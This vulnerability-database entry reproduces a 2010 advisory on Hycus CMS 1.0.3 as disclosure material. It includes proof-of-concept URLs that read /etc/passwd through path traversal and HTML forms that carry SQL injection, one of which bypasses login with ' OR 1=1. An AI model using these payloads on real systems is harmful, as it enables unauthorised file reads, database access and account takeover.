ID

VAR-E-201012-0374


CVE

cve_id:CVE-2010-4612

Trust: 1.9

cve_id:CVE-2010-4613

Trust: 1.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

EDB ID

15797


TITLE

Hycus CMS - Multiple Vulnerabilities - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 15797

DESCRIPTION

Hycus CMS - Multiple Vulnerabilities. CVE-2010-4613CVE-2010-4612CVE-70218CVE-70217CVE-70148CVE-70147CVE-70146CVE-70145 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 15797

AFFECTED PRODUCTS

vendor:hycusmodel:cmsscope: - version: -

Trust: 1.6

vendor:hycusmodel:cmsscope:eqversion:1.0.3

Trust: 0.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

EXPLOIT

Vulnerability ID: HTB22737
Reference: http://www.htbridge.ch/advisory/lfi_in_hycus_cms.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: LFI
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" and "admin.php" scripts to properly sanitize user-supplied input in "site" variable.

The following PoC is available:

http://[host]/index.php?site=../../../../../../../etc/passwd%00
http://[host]/admin.php?site=../../../../../../../etc/passwd%00

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "useremail" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/forgotpass.html" method="post" name="main" >
<input type="hidden" name="useremail" value="1'SQL_CODE"/>
<input type="submit" value="submit" name="submit" />
</form>

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "q" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?search/1.html" method="post" name="main" >
<input type="hidden" name="q" value="search' union select 1,2,@@version -- 3"/>
<input type="submit" value="submit" name="submit" />
</form>

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "user_name" and "usr_email" variables.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/hregister.html" method="post" name="main" >
<input type="hidden" name="full_name" value="username"/>
<input type="hidden" name="user_name" value="1'SQL_CODE"/>
<input type="hidden" name="usr_email" value="test@mail.com'SQL_CODE"/>
<input type="hidden" name="pwd" value="123456"/>
<input type="hidden" name="pwd2" value="123456"/>
<input type="submit" value="submit" name="submit" />
</form>

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "usr_email" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:

<form action="http://[host]/?user/1/hlogin.html" method="post" name="main" >
<input type="hidden" name="usr_email" value="1' OR 1=1 -- 1"/>
<input type="hidden" name="pwd" value="any"/>
<input type="submit" value="submit" name="submit" />
</form>

Trust: 1.0

sources: EXPLOIT-DB: 15797

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 15797

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 15797

TYPE

Multiple Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 15797 // EDBNET: 38624

CREDITS

High-Tech Bridge SA

Trust: 0.6

sources: EXPLOIT-DB: 15797

EXTERNAL IDS

db:NVDid:CVE-2010-4612

Trust: 1.9

db:EXPLOIT-DBid:15797

Trust: 1.6

db:NVDid:CVE-2010-4613

Trust: 1.3

db:EDBNETid:38624

Trust: 0.6

db:BIDid:45527

Trust: 0.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-4612

Trust: 1.6

url:http://www.htbridge.ch/advisory/lfi_in_hycus_cms.html

Trust: 1.3

url:https://nvd.nist.gov/vuln/detail/cve-2010-4613

Trust: 1.0

url:https://www.exploit-db.com/exploits/15797/

Trust: 0.6

url:http://www.hycus.com/

Trust: 0.3

sources: BID: 45527 // EXPLOIT-DB: 15797 // EDBNET: 38624

SOURCES

db:BIDid:45527
db:EXPLOIT-DBid:15797
db:EDBNETid:38624

LAST UPDATE DATE

2022-07-27T10:03:38.479000+00:00


SOURCES UPDATE DATE

db:BIDid:45527date:2015-04-13T21:02:00

SOURCES RELEASE DATE

db:BIDid:45527date:2010-12-21T00:00:00
db:EXPLOIT-DBid:15797date:2010-12-21T00:00:00
db:EDBNETid:38624date:2010-12-21T00:00:00